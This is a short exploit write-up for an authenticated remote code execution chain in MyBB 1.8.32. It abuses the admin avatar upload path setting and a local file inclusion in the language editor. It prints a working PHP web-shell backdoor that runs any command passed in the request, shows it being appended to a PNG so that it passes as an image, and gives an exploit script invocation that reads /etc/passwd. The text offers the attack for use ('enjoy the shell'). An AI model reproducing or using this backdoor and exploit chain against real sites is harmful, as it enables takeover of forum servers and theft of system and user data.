- exploit database exp MyBB 1.8.32 - Remote Code Execution (RCE) (Authenticated)
- detailed analyse to mybb 1.8.32 代码审计 + LFI RCE 复现
(1). An RCE can be obtained on MyBB's Admin CP in Configuration -> Profile Options -> Avatar Upload Path. to change Avatar Upload Path to /inc to bypass blacklist upload dir.
(2). after doing that, then we are able to chain in "admin avatar upload" page: http://www.mybb1832.cn/admin/index.php?module=user-users&action=edit&uid=1#tab_avatar, and LFI in "Edit Language Variables" page: http://www.mybb1832.cn/admin/index.php?module=config-languages&action=edit&lang=english.
(3). This chained bugs can lead to Authenticated RCE. (note). The user must have rights to add or update settings and update Avatar. This is tested on MyBB 1.8.32.
- first choose a png file that size less than 1kb
- then merge the png file with a php simple backdoor file using the following commands
mac@xxx-2 php-backdoor % cat simple-backdoor.php
<?php
if(isset($_REQUEST['cmd'])){
echo "<getshell success>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "<getshell success>";
phpinfo();
}
?>
mac@xxx-2 php-backdoor % ls
simple-backdoor.php test.png
mac@xxx-2 php-backdoor % cat simple-backdoor.php >> test.png
mac@xxx-2 php-backdoor % file test.png
test.png: PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
- finally run the following commands to run the exp script to get RCE output! enjoy the shell...
python3 exp.py --host http://www.xxx.cn --username admin --password xxx --email [email protected] --file avatar_1.png --cmd "cat /etc/passwd"